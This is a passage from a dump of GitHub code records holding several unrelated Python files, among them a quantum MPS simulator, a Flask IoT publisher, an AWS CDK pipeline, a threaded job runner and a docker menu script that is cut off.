best_optimal:\n            self.discard.add(x)\n        # join the most optimal coalition to the final optimal coalition\n        self.final_coalition.append(best_optimal)\n\n    # gives the most optimal coalition and its value for an agent i\n    def calculate_si(self, i):\n        payoff = 0 # stores the payoff of the optimal coalition\n        optimal = set() # stores the most optimal coalition for the agent i\n        # print(\"for i \", i)\n        # iterate through all coalitions that include i\n        for coalition, _ in self.chf_table.items():\n            d = set(coalition) # typecasting tuple to set\n            if i in coalition and len(d.intersection(self.discard)) == 0:\n                if self.chf_table[coalition] / len(coalition) > payoff:\n                    optimal = coalition\n                    payoff = self.chf_table[coalition] / len(coalition)\n\n        # print(\"the payoff is \", payoff)\n        # print(\"the optimal is \", optimal)\n        return payoff, optimal\n\n    # it prints the optimal coalition table\n    def print_optimal_coalition(self):\n        print(\"Final optimal coalition: \")\n        for coalition in self.final_coalition:\n            print(coalition)\n        print('\\n')\n","repo_name":"jainkashish/MAS-PROJECT","sub_path":"coalition.py","file_name":"coalition.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39501414131","text":"# \"\"\"\n# This is the interface that allows for creating nested lists.\n# You should not implement it, or speculate about its implementation\n# \"\"\"\n#class NestedInteger(object):\n#    def isInteger(self):\n#        \"\"\"\n#        @return {boolean} True if this NestedInteger holds a single integer,\n#        rather than a nested list.\n#        \"\"\"\n#\n#    def getInteger(self):\n#        \"\"\"\n#        @return {int} the single integer that this NestedInteger holds,\n#        if it holds a single integer\n#        Return None if this NestedInteger holds a nested list\n#        \"\"\"\n#\n#    def getList(self):\n#        \"\"\"\n#        @return {NestedInteger[]} the nested list that this NestedInteger holds,\n#        if it holds a nested list\n#        Return None if this NestedInteger holds a single integer\n#        \"\"\"\nfrom collections import deque\n\n\nclass Solution(object):\n    # @param {NestedInteger[]} nestedList a list of NestedInteger Object\n    # @return {int} an integer\n    # BFS\n    def depthSum(self, nestedList):\n        if not nestedList:\n            return 0\n        ans = 0\n        q = deque([(nestedList, 1)])\n        while len(q) > 0:\n            curt, level = q.popleft()\n            for elem in curt:\n                if elem.isInteger():\n                    ans += elem.getInteger() * level\n                else:\n
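                    # a nested list counts at the next depth, so enqueue it with level + 1\n                    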
q.append((elem.getList(), level + 1))\n return ans\n\n","repo_name":"jwyx3/practices","sub_path":"python/nested-list-weight-sum.py","file_name":"nested-list-weight-sum.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6550813271","text":"import numpy as np\nfrom collections import defaultdict\nfrom qsim.mps.hamiltonians import create_magnetisation_mpo\nfrom qsim.exact.state_vectors import state_vectors_one_to_many\nfrom qsim.mps.state_vectors import normalise_mps, evaluate_mps\nimport copy\n\n\ndef do_mpo_on_mps(mpo, mps):\n \"\"\"\n Applies the mpo to the mps and returns the new mps without truncation\n Args:\n mpo: mpo array of length \"qubit_num\" with (local)\n shape (b_{k-1}, b_{k}, sigma_{k}^{'}, sigma_{k})\n mps: mps array of length \"qubit_num\" with (local)\n shape (sigma_{k}, a_{k-1}, a_{k})\n Returns:\n new_mps: mps array of length \"qubit_num\" with (local)\n shape (sigma_{k}, b_{k-1}*a_{k-1}, b_{k}*a_{k})\n \"\"\"\n if len(mpo) != len(mps):\n raise Exception('mpo length != mps length')\n new_mps = [[]] * len(mps)\n for i, o in enumerate(mpo):\n d = mps[i].shape[0]\n a1, a2 = mps[i].shape[1:]\n b1, b2 = o.shape[:2]\n s = np.tensordot(o, mps[i], axes=1)\n s = np.moveaxis(s, [2, 0, 3, 1, 4], [0, 1, 2, 3, 4])\n new_mps[i] = s.reshape(d, b1 * a1, b2 * a2)\n return new_mps\n\n\ndef projection(mps, axis='Z'):\n \"\"\"\n Function which finds the projections for a set of mps states onto an axis\n Args:\n mps_list: state vectors list with shape (qubit_num, 2, a0, a1)\n axis for the qubits to be projected onto 'X', 'Y' or 'Z' (default Z)\n Returns:\n projection onto axis shape (qubit_num)\n \"\"\"\n qubit_num = len(mps)\n projections = np.zeros(qubit_num)\n for q in range(qubit_num):\n projection_mat = create_magnetisation_mpo(qubit_num, q, axis=axis)\n final_state = do_mpo_on_mps(projection_mat, mps)\n projections[q] = 2 * np.real(find_overlap(final_state, mps))\n return projections\n\n\ndef find_overlap(mps1, mps2):\n \"\"\"\n Function which finds overlap of two states in mps form\n Args:\n mps1: mps array of length \"qubit_num\" with (local)\n shape (sigma_{k}, a_{k-1}, a_{k})\n mps2: mps array of length \"qubit_num\" with (local)\n shape (sigma_{k}, a_{k-1}, a_{k})\n Returns:\n norm/overlap\n \"\"\"\n if len(mps1) != len(mps2):\n raise Exception('mps1 length != mps2 length')\n norm = np.ones([1, 1])\n for i in range(len(mps1)):\n norm = np.tensordot(np.conjugate(mps1[i]), np.tensordot(\n norm, mps2[i], axes=([1], [1])), axes=([1, 0], [0, 1]))\n return norm[0, 0]\n\n\ndef find_entropy(mps, k=None):\n \"\"\"\n Finds the entanglement entropy of the mps when cutting the system\n to left of site k\n Args:\n mps: mps array of length \"qubit_num\" with (local)\n shape (sigma_{k}, a_{k-1}, a_{k})\n k: cutting to the left of site k\n (default: middle of the system => entanglement entropy)\n Returns:\n entanglement entropy\n \"\"\"\n if k is None:\n k = int(np.floor(len(mps) / 2))\n mps, sing_vals = normalise_mps(mps, direction='S', k=k)\n entropy = -1 * sum([i**2 * np.log(i**2) for i in sing_vals if abs(i) > 0])\n return entropy\n\n\ndef time_evolution(initial_mps, mpo_method_list, time_step, time, max_d=None,\n print_out=False, measurements=None, **kwargs):\n \"\"\"\n Evolve mps over a certain time (\"time\") with finite time-step (\"time_step\")\n with unitary mpo specified by mpo_method_list\n Args:\n initial_mps: mps array of length \"qubit_num\" with (local)\n shape (sigma_{k}, 
a_{k-1}, a_{k})\n        mpo_method_list: list of mpo methods to create mpo array of length\n                        \"qubit_num\" with (local) shape\n                        (b_{k-1}, b_{k}, sigma_{k}^{'}, sigma_{k})\n                        to be applied at each time step\n        time_step: time step size for each method to be applied\n        time: total time\n        max_d: (optional) dimension to truncate mps to at each step,\n               if not specified mps will grow with each step\n        print_out: (bool default False), print intermediary states\n        measurements: (list), what to keep at each time step\n        **kwargs to be passed to mpo_methods\n\n    Returns\n        outputs: dict\n    \"\"\"\n    meas = defaultdict(lambda: False)\n    meas.update(dict.fromkeys(measurements or [], True))\n    qubit_num = len(initial_mps)\n    points = round(time / time_step + 1)\n    time_array = np.linspace(0, time, points)\n    outputs = {}\n    outputs['initial_state'] = initial_mps\n    outputs['time'] = time_array\n    if meas['intermediary_states']:\n        outputs['intermediary_states'] = [[]] * points\n        outputs['intermediary_states'][0] = initial_mps\n    if meas['entanglement_entropy']:\n        outputs['entanglement_entropy'] = [[]] * points\n        outputs['entanglement_entropy'][0] = find_entropy(initial_mps)\n    if meas['X']:\n        outputs['X'] = [[]] * points\n        outputs['X'][0] = projection(initial_mps, axis='X')\n    if meas['Y']:\n        outputs['Y'] = [[]] * points\n        outputs['Y'][0] = projection(initial_mps, axis='Y')\n    if meas['Z']:\n        outputs['Z'] = [[]] * points\n        outputs['Z'][0] = projection(initial_mps, axis='Z')\n    mpo_list = [mpo_method(qubit_num=qubit_num, t=time_step, **kwargs)\n                for mpo_method in mpo_method_list]\n    if print_out:\n        print('initial_state: ' + state_vectors_one_to_many(\n            evaluate_mps(initial_mps), as_str=True))\n    mps = copy.deepcopy(initial_mps)\n    for i in range(1, points):\n        for mpo in mpo_list:\n            mps = do_mpo_on_mps(mpo, mps)\n            mps = normalise_mps(mps, direction='R')\n            mps = normalise_mps(mps, direction='L', max_d=max_d)\n        if meas['intermediary_states']:\n            outputs['intermediary_states'][i] = mps\n        if meas['entanglement_entropy']:\n            outputs['entanglement_entropy'][i] = find_entropy(mps)\n        if meas['X']:\n            outputs['X'][i] = projection(mps, axis='X')\n        if meas['Y']:\n            outputs['Y'][i] = projection(mps, axis='Y')\n        if meas['Z']:\n            outputs['Z'][i] = projection(mps, axis='Z')\n        if print_out:\n            print('time: {}, state: {}'.format(\n                time_array[i],\n                state_vectors_one_to_many(evaluate_mps(mps), as_str=True)))\n    outputs['final_state'] = mps\n    return outputs\n","repo_name":"nataliejpg/Qsim","sub_path":"qsim/mps/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":6328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42925864957","text":"from flask import Flask, render_template, request, jsonify, redirect, url_for\nimport requests\nfrom markupsafe import escape\nimport datetime\n# import Adafruit_DHT\n\napp = Flask(__name__)\n\nnow = datetime.datetime.now()\ntimestring = now.strftime(\"%Y-%m-%d %H:%M\")\nglobal keepPublishing\nkeepPublishing = True\n\n@app.route(\"/\")\ndef main():\n    templateData = {\n        \"time\": now,\n        \"title\": \"Rest_API\",\n        \"isPublishing\": False\n    }\n    return render_template(\"index.html\", **templateData)\n\n@app.route(\"/sensorData\")\ndef sensorData():\n    hum, temp = 0,1\n    # hum, temp = Adafruit_DHT.read_retry(11, 4)\n    if hum is not None and temp is not None:\n        return jsonify({'temperature': temp,'humidity':hum})\n    else:\n        return jsonify({'error': 'Sensor not working.'})\n\n@app.route(\"/publish\", methods=['POST'])\ndef publish():\n
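    # the ThingSpeak write API key is supplied by the user through the submitted form\n    writeApi = 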
request.form.get(\"writeApi\")\n    hum, temp = 0,1\n    # hum, temp = Adafruit_DHT.read_retry(11, 4)\n    data = \"field1=\"+str(temp)+\"&field2=\"+str(hum)+\"&status=mqttpublish\"\n    pub_data = \"Temperature = {}, Humidity = {}\".format(temp,hum)\n    if hum is not None and temp is not None:\n        requests.get(\"https://api.thingspeak.com/update?api_key=\"+writeApi+\"&\"+data)\n        templateData = {\n            \"time\": now,\n            \"title\": \"Rest_API\",\n            \"isPublishing\": True,\n            \"writeApi\": writeApi,\n            \"data\": pub_data\n        }\n    else:\n        templateData = {\n            \"time\": now,\n            \"title\": \"Rest_API\",\n            \"isPublishing\": False\n        }\n    return render_template(\"index.html\", **templateData)\n\nif __name__ == '__main__':\n    app.run(debug=True)\n\n","repo_name":"vivekkr2001/Internet_of_Things","sub_path":"q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3612695804","text":"import torch.nn as nn\nimport torch\n\nfrom utils import build_targets\n\n\nclass YoloLoss(nn.Module):\n    def __init__(self, lambda_coord=5, lambda_noobject=0.5, image_size=448):\n        super().__init__()\n        self.lambda_coord = lambda_coord\n        self.lambda_noobject = lambda_noobject\n        self.epsilon = 1e-5\n\n        self.grid_size = image_size // 64\n\n    def forward(self, y_pred, y_true):\n        y_true = build_targets(y_pred, self.grid_size)\n        batch_size = y_pred.size(0)\n        y_pred = y_pred.view(size=(batch_size, self.grid_size, self.grid_size, -1))\n        print(y_pred.size())\n\n\ngrid = 7\nnum_class = 2\nnum_box = 2\ny_pred = torch.rand((2, grid * grid * (num_box * 5 + num_class)))\nloss = YoloLoss()\n\ny_true = torch.rand((2, 5))\nloss(y_pred, None)\n","repo_name":"vanloc19bk96/yolov1","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8735039534","text":"from itertools import product\nfrom queue import Queue\n\nwith open(\"day_11/input.txt\") as file:\n    board = [[int(n) for n in line.strip()] for line in file.readlines()]\n\nSIZE_X = len(board[0])\nSIZE_Y = len(board)\n\nSTEPS = 100\n\ntotal_flashes = 0\n\nfor _ in range(STEPS):\n    for x0, y0 in product(range(SIZE_X), range(SIZE_Y)):\n        board[x0][y0] += 1\n\n        # Only if it is equal to 10 as it can only flash once per step\n        if board[x0][y0] == 10:\n            flash_queue = Queue()\n            flash_queue.put((x0, y0))\n\n            while not flash_queue.empty():\n                x0, y0 = flash_queue.get()\n                total_flashes += 1\n\n                for dx, dy in product((-1, 0, 1), (-1, 0, 1)):\n                    x = x0 + dx\n                    y = y0 + dy\n\n                    # Bound check\n                    if not (0 <= x < SIZE_X and 0 <= y < SIZE_Y):\n                        continue\n\n                    board[x][y] += 1\n\n                    # Check if this new cell flashed\n                    if board[x][y] == 10:\n                        flash_queue.put((x, y))\n\n    # Normalize back to 0: every cell that flashed this step holds a value >= 10\n    # (a cell left at exactly 10 flashed but received no later increments)\n    for x, y in product(range(SIZE_X), range(SIZE_Y)):\n        if board[x][y] >= 10:\n            board[x][y] = 0\n\nprint(total_flashes)\n","repo_name":"Akarys42/aoc-2021","sub_path":"day_11/part_1.py","file_name":"part_1.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3996582947","text":"import asyncio\nimport logging\nfrom queue import Queue\nimport threading\nimport time\nfrom typing import *\nfrom uuid import uuid4\n\nimport stopit\n\nfrom citrine_daemon import errors, package\nfrom citrine_daemon.server.json import CitrineEncoder\n\n\nlogger = logging.getLogger(__name__)\n\nprimary_job_queue = 
Queue(maxsize=1000)\njob_cache_hold_time = 60\njob_cache: Dict[str, 'AsyncFuture'] = {}\n\nthread_local = threading.local()\nthread_local.active_job = None\n\nuuid = lambda: str(uuid4()).replace('-', '')\n# TODO janitor\n# Old results (in fs / db), old futures, old packages should be cleaned up at a configurable interval\n\n\nclass FutureState:\n INITIALIZED = 0\n RUNNING = 1\n DONE = 2\n ERROR = -1\n INTERRUPTED = -2\n\n @staticmethod\n def get_msg(state):\n return {\n FutureState.INITIALIZED: 'Initializing',\n FutureState.RUNNING: 'In Progress',\n FutureState.DONE: 'Done',\n FutureState.ERROR: 'Error',\n FutureState.INTERRUPTED: 'Interrupted',\n }.get(state)\n\n\nclass AsyncFuture(object):\n \"\"\"\n Utility for crossing thread boundaries from within an asyncio event loop\n \"\"\"\n \n def __init__(self, fn, args=None, kwargs=None, request_info=None):\n self.fn = fn\n self.args = args or ()\n self.kwargs = kwargs or {}\n self.request_info = request_info\n self.cache_expire = None\n \n self.result_val = None\n self.result_exc = None\n self.extra_data = {}\n\n self.uid = uuid() # type: str\n self.thread = None\n # initialized -> running, interrupted\n # running -> done, error, interrupted\n self.state = FutureState.INITIALIZED\n self._state_lock = threading.Lock()\n\n self._done = asyncio.Event()\n _event_set = self._done.set\n _threadsafe_call = asyncio.get_running_loop().call_soon_threadsafe\n self.set_done = lambda: _threadsafe_call(_event_set)\n job_cache[self.uid] = self\n \n def run(self, thread):\n logger.debug('Executing async job')\n if self.state != FutureState.INITIALIZED:\n return\n try:\n self.thread = thread # Once this is set, thread can be interrupted\n self.transition(FutureState.RUNNING)\n self.result_val = self.fn(*self.args, **self.kwargs)\n self.transition(FutureState.DONE)\n logger.debug('Async job complete')\n except errors.JobInterrupted as e:\n self.result_exc = e\n logger.info('Async job interrupted')\n except Exception as e:\n self.transition(FutureState.ERROR)\n self.result_exc = e\n logger.warning('Async job failed')\n\n self.set_done()\n \n def transition(self, to_state: int):\n with self._state_lock:\n self.state = to_state\n \n def interrupt(self):\n with self._state_lock:\n if self.state == FutureState.RUNNING:\n stopit.async_raise(self.thread.ident, errors.JobInterrupted('Interrupted by user'))\n if self.state in {FutureState.RUNNING, FutureState.INITIALIZED}:\n self.state = FutureState.INTERRUPTED\n\n async def result(self):\n await self._done.wait()\n if self.result_exc:\n raise self.result_exc\n else:\n return self.result_val\n \n def to_dict(self):\n res = {\n 'uid': self.uid,\n 'status': FutureState.get_msg(self.state),\n 'data': self.extra_data,\n }\n if self.result_exc:\n res['error'] = self.result_exc\n if self.result_val:\n res['result'] = self.result_val\n return res\n \n\nCitrineEncoder.register_encoder(AsyncFuture, lambda fut: fut.to_dict())\n\n\nasync def run_in_worker(fn, args=None, kwargs=None, request_info=None):\n fut = AsyncFuture(fn, args, kwargs, request_info)\n primary_job_queue.put(fut)\n return await fut.result()\n\n\ndef run_async(fn, args=None, kwargs=None, request_info=None):\n fut = AsyncFuture(fn, args, kwargs, request_info)\n logger.debug(f'Queueing async job {fut.uid}', {'async_job_id': fut.uid})\n primary_job_queue.put(fut)\n return fut\n\n\ndef get_future(uid: str) -> AsyncFuture:\n if uid in job_cache:\n return job_cache[uid]\n raise errors.NoSuchJob(f'No such job {uid}', data={'uid': uid})\n\n\ndef get_active_job() -> 
Optional[AsyncFuture]:\n return getattr(thread_local, 'active_job', None)\n\n\ndef worker_thread(worker_id: int):\n logger.info(f'Worker {worker_id} initialized')\n self = threading.current_thread()\n while True:\n job: AsyncFuture = primary_job_queue.get()\n thread_local.active_job = job\n logger.debug('Worker starting async job')\n package.db.start_connection()\n try:\n job.run(self)\n except errors.JobInterrupted:\n pass\n package.db.end_connection(commit=(job.state == FutureState.DONE))\n job.cache_expire = time.time() + job_cache_hold_time\n logger.debug('Worker finished async job')\n thread_local.active_job = None\n \n \ndef janitor_thread():\n logger.info('Janitor initialized')\n while True:\n time.sleep(job_cache_hold_time)\n t = time.time()\n purge_jobs = []\n for job_id, cached_job in job_cache.items():\n if cached_job.cache_expire is None:\n continue\n if cached_job.cache_expire < t:\n purge_jobs.append(job_id)\n for job_id in purge_jobs:\n job_cache.pop(job_id)\n\n\ndef job_put_extra(key: str, value: any):\n fut: AsyncFuture = thread_local.active_job\n fut.extra_data[key] = value\n\n\ndef init_workers(n_workers: int):\n logger.info('Booting threadpool')\n threadpool = []\n for idx in range(n_workers):\n threadpool.append(threading.Thread(\n name=f'worker-{idx}',\n target=worker_thread,\n args=(idx,),\n daemon=True,\n ))\n [t.start() for t in threadpool]\n threading.Thread(\n name='janitor',\n target=janitor_thread,\n daemon=True,\n ).start()\n","repo_name":"antonpaquin/citrine","sub_path":"citrine-daemon/citrine_daemon/server/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":6158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19457409121","text":"# const.py\n\n\"\"\" This module defines project-level constants\"\"\"\n\ngrillTemp = 2\ngrillTempHigh = 3\nprobeTemp = 4\nprobeTempHigh = 5\ngrillSetTemp = 6\ngrillSetTempHigh = 7\nprobeTemp2 = 16\nprobeSetTemp2 = 18\ncurveRemainTime = 20\nwarnCode = 24\nprobeSetTemp = 28\nprobeSetTempHigh = 29\ngrillState = 30\ngrillMode = 31\nfireState = 32\nfileStatePercent = 33\nprofileEnd = 34\ngrillType = 35\npelletAlarm1 = 48\npelletAlarm2 = 50\ngrillStates = {\n 0: 'OFF',\n 1: 'ON',\n 2: 'FAN',\n 3: 'REMAIN',\n }\nfireStates = {\n 0: 'DEFAULT',\n 1: 'OFF',\n 2: 'STARTUP',\n 3: 'RUNNING',\n 4: 'COOLDOWN',\n 5: 'FAIL',\n }\nwarnStates = {\n 0: 'FAN_OVERLOADED',\n 1: 'AUGER_OVERLOADED',\n 2: 'IGNITOR_OVERLOADED',\n 3: 'BATTERY_LOW',\n 4: 'FAN_DISCONNECTED',\n 5: 'AUGER_DISCONNECTED',\n 6: 'IGNITOR_DISCONNECTED',\n 7: 'LOW_PELLET',\n }\ncommands ={\n 'on':'UK001!',\n 'off':'UK004!',\n 'status':'UR001!',\n 'id':'UL!',\n 'tempSet':{\n 'grill':'UT',\n 'probe1':'UF',\n 'probe2':'Uf',\n }\n}","repo_name":"mckaycr/greenmountaingrill","sub_path":"gmg/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35520082317","text":"from aws_cdk import(\n core,\n aws_lambda,\n aws_codebuild as codebuild,\n aws_codepipeline as codepipeline,\n aws_codepipeline_actions as codepipeline_actions,\n aws_iam as iam,\n aws_secretsmanager as secretsmanager\n)\n\nowner = \"takeru911\"\nrepo_name = \"cdk-lambda\"\ntag = \"my-cicd\"\ntarget_function_name = \"sample-function\"\n\nclass MyCicdStack(core.Stack):\n\n def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:\n super().__init__(scope, id, **kwargs)\n\n # The code that defines your stack 
goes here\n for stage in [\"prd\", \"dev\"] :\n target_function = self.create_function(stage)\n project = self.create_project(target_function, stage)\n source_output = codepipeline.Artifact(self.create_name(stage));\n branch = \"master\" if stage == \"prd\" else \"develop\"\n codepipeline.Pipeline(self, self.create_id(\"Pipeline\", stage),\n pipeline_name=self.create_name(stage),\n stages=[\n codepipeline.StageProps(\n stage_name=\"Source\",\n actions=[self.create_source_action(branch, source_output)]),\n codepipeline.StageProps(\n stage_name=\"Build\",\n actions=[self.create_build_action(project, source_output)])\n ])\n\n def create_id(self, name, stage):\n return \"-\".join([tag, name, stage])\n\n def create_name(self, stage):\n return \"_\".join([tag, stage])\n \n def create_function(self, stage):\n return aws_lambda.Function(\n self,\n self.create_id(\"Target\", stage),\n function_name=target_function_name + \"_\" + stage,\n code=aws_lambda.Code.asset(\"dmy\"),\n handler=\"main.handle\",\n runtime=aws_lambda.Runtime.PYTHON_3_6\n )\n\n def create_project(self, target_function, stage):\n project = codebuild.PipelineProject(\n self,\n self.create_id(\"Project\", stage),\n project_name=self.create_name(stage),\n environment_variables={\n \"FUNCTION_NAME\": codebuild.BuildEnvironmentVariable(\n value=target_function.function_name,\n type=codebuild.BuildEnvironmentVariableType.PLAINTEXT),\n \"STAGE\": codebuild.BuildEnvironmentVariable(\n value=stage,\n type=codebuild.BuildEnvironmentVariableType.PLAINTEXT)\n }\n )\n project.add_to_role_policy(\n iam.PolicyStatement(\n resources=[target_function.function_arn],\n actions=['lambda:UpdateFunctionCode',\n 'lambda:UpdateFunctionConfiguration']\n )\n )\n return project\n\n def create_source_action(self, branch, source_output):\n secret = secretsmanager.Secret.from_secret_attributes(self,\n branch + \"_secret\",\n secret_arn=\"arn:aws:secretsmanager:ap-northeast-1:044768335503:secret:github-api-token-wtevPt\")\n oauth_token = secret.secret_value_from_json(\"github-api-token\")\n\n return codepipeline_actions.GitHubSourceAction(\n action_name=\"GithubRepo\",\n oauth_token=oauth_token,\n output=source_output,\n owner=owner,\n repo=repo_name,\n branch=branch\n )\n\n def create_build_action(self, project, source_output):\n action_name = \"CodeBuild\"\n return codepipeline_actions.CodeBuildAction(\n action_name=action_name,\n project=project,\n input=source_output,\n outputs=[codepipeline.Artifact(\"Test\")]\n )\n\n","repo_name":"takeru911/cdk-cicd","sub_path":"my_cicd/my_cicd_stack.py","file_name":"my_cicd_stack.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21047414323","text":"import six\n\n\nclass DataIterator(six.Iterator):\n \"\"\"An iterator over data, representing a single epoch.\n\n Parameters\n ----------\n data_stream : :class:`DataStream` or :class:`Transformer`\n The data stream over which to iterate.\n request_iterator : iterator\n An iterator which returns the request to pass to the data stream\n for each step.\n\n \"\"\"\n def __init__(self, data_stream, request_iterator=None, as_dict=False):\n self.data_stream = data_stream\n self.request_iterator = request_iterator\n self.as_dict = as_dict\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.request_iterator is not None:\n data = self.data_stream.get_data(next(self.request_iterator))\n else:\n data = self.data_stream.get_data()\n if self.as_dict:\n return 
dict(zip(self.data_stream.sources, data))\n else:\n return data\n","repo_name":"lramach/fuel-datasets","sub_path":"iterator.py","file_name":"iterator.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32557733328","text":"#!/usr/bin/env python\nimport numpy as np\nimport os\n# from m2m_manga_utils import write_mge\n# from m2m_manga_utils import symmetrize_velfield\n# import util_config as uc\nfrom m2m_data_bin_util import create\nimport pyfits\nfrom optparse import OptionParser\n\n\nif __name__ == '__main__':\n parser = OptionParser()\n parser.add_option('-g', action='store', type='string',\n dest='gname', default=None, help='galaxy name')\n parser.add_option('-m', action='store', type='string',\n dest='mname', default=None, help='model name')\n parser.add_option('-s', action='store_false', dest='symmetrize',\n default=True, help='model name')\n (options, args) = parser.parse_args()\n gname = options.gname\n if options.mname is None:\n mname = gname\n else:\n mname = options.mname\n\n lhy = create(mname, folder=gname)\n with open('{}/auxiliary_data/information.dat'.format(gname), 'r') as ff:\n ang = float(ff.readline())\n eps = float(ff.readline())\n dist = float(ff.readline())\n Re_arcsec = float(ff.readline())\n mge = np.genfromtxt(\n '{}/MGE{}/m2m_mge_lum'.format(gname, mname),\n skip_header=1)\n hdulist = pyfits.open('{}/auxiliary_data/IFU.fits'.format(gname))\n data1 = hdulist[1].data\n data2 = hdulist[2].data\n x0 = data1['xbin']\n y0 = data1['ybin']\n tem_rebin_x = data2['rebin_x']\n tem_rebin_y = data2['rebin_y']\n\n pa = np.radians(ang - 90.0)\n xbin = np.cos(pa)*x0-np.sin(pa)*y0 + 1e-6\n ybin = np.sin(pa)*x0+np.cos(pa)*y0 - 1e-6\n rebin_x = np.cos(pa) * tem_rebin_x - np.sin(pa) * tem_rebin_y\n rebin_y = np.sin(pa) * tem_rebin_x + np.cos(pa) * tem_rebin_y\n\n r = (xbin**2 + ybin**2)**0.5\n ii = r < 3.0\n v0 = data1['v0']\n vel = v0 - v0[ii].mean()\n # rotate the data until velocity have positive value for x < 0\n iii = xbin < 0.0\n rotate = vel[iii].mean()\n if rotate < 0.0:\n pa = np.radians(ang - 90.0 + 180.0)\n xbin = np.cos(pa)*x0-np.sin(pa)*y0\n ybin = np.sin(pa)*x0+np.cos(pa)*y0\n rebin_x = np.cos(pa) * tem_rebin_x - np.sin(pa) * tem_rebin_y\n rebin_y = np.sin(pa) * tem_rebin_x + np.cos(pa) * tem_rebin_y\n v0_err = data1['v0_err'].clip(2.0, 200.0)\n # v0_err = np.zeros_like(vel) + 15.0\n vd = data1['vd']\n vd_err = data1['vd_err'].clip(2.0, 200.0)\n IFU_Z = data1['metal']\n IFU_Z_err = IFU_Z * 0.05\n # vd_err = (vd.copy() * 0.05).clip(6.0)\n # h3 = data1['h3']\n # h3_err = data1['h3_err']\n # h4 = data1['h4']\n # h4_err = data1['h4_err']\n\n mask_filename = '{}/auxiliary_data/IFU_mask.fits'.format(gname)\n if os.path.exists(mask_filename):\n mask = pyfits.open(mask_filename)[0].data\n else:\n mask = np.zeros_like(xbin, dtype=int)\n goodbins = (mask == 0).astype(int)\n\n # mge[:,0] = mge[:,0] / (2.0 * np.pi * mge[:,1]**2 * mge[:,2])\n # do not use this again, it has been included in the create_data_bin.py\n # file\n lhy.surface_brightness(mge)\n inc_deg = lhy.xconfig.getfloat('sec:Model', 'inclination')\n lhy.luminosity_density(mge, inc_deg)\n lhy.IFU(xbin, ybin, vel=vel, vel_err=v0_err, disp=vd, disp_err=vd_err,\n # h3=h3, h3_err=h3_err, h4=h4, h4_err=h4_err,\n rebin_x=rebin_x, rebin_y=rebin_y,\n dist=dist, n_part=300000, plot=False, Re=Re_arcsec, good=goodbins,\n symmetrize=options.symmetrize, vertexStep=1)\n lhy.specline('IFU_Z', xbin, ybin, IFU_Z*1, 
IFU_Z_err*1)\n","repo_name":"HongyuLi2016/lhy_m2m_utilities","sub_path":"MaNGA/m2m-make_manga_data.py","file_name":"m2m-make_manga_data.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70225799875","text":"from time import time\nfrom database import *\nfrom scrapper import Scrapper\n\n\n@db_session\ndef get_words(start_index):\n    words = []\n    for w in Words.select().order_by(Words.word).limit(10, start_index):\n        words.append(w.word)\n\n    return words\n\n\n@db_session\ndef scrape_words(words, scrapper):\n    for word in words:\n        connected = scrapper.scrape(word)\n        if connected:\n            update_word(word, scrapper.audio(), scrapper.details())\n            for line in scrapper.examples():\n                save_sentence(word, line)\n\n            print('--------------saved----------------')\n\n\ndef update_word(word, audio, details):\n    \"\"\"should be called from inside function with db_session\"\"\"\n    row = Words.get(word=word)\n    if row:\n        row.set(audio=audio, details=details)\n\n\ndef save_sentence(word, sentence):\n    row = Examples.select(lambda c: c.word == word and c.sentence == sentence).exists()\n    if not row:\n        Examples(word=word, sentence=sentence)\n\n\ndef main():\n    start_time = time()\n    scrapper = Scrapper()\n    for index in range(1482, 2000, 10):\n        print(\"scraping started from {}\".format(index))\n        words = get_words(index)\n        scrape_words(words, scrapper)\n\n    scrapper.close()\n    print(\"duration: {}\".format(time() - start_time))\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"mahabubulhasan/word-parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22397019535","text":"import subprocess as sp\nimport os\nwhile True:\n\t\t#form = cgi.FieldStorage()\n\t\tprint(\"Press 1 to launch docker container\nPress 2 to start docker services\nPress 3 to see status of docker services\nPress 4 to attach docker container\nPress 5 to configure web server on running docker container\nPress 6 to setup python3 on running docker container\nPress 7 to know the IP Address of running docker container\nPress 8 to start docker container\nPress 9 to kill docker container\nPress 10 to know status of all docker containers\nPress 11 to see the running docker containers\nPress 12 to copy files from base os to docker container\nPress 13 to see docker images\nPress 14 to download docker os images\nPress 15 to install docker\nPress 16 to remove stopped docker container\nPress 17 to remove all stopped containers\nPress 20 to exit\")\n\t\tchoice = input(\"\\n\\n\\nEnter your choice: \")\n\t\tif int(choice)==1:\n\n\t\t\tosname = input(\"Enter the osname: \")\n\t\t\tosimage = input(\"Enter os image: \")\n\t\t\t#print(osname)\n\n\n\t\t\tcmd = \"docker run -d -i -t --name {0} 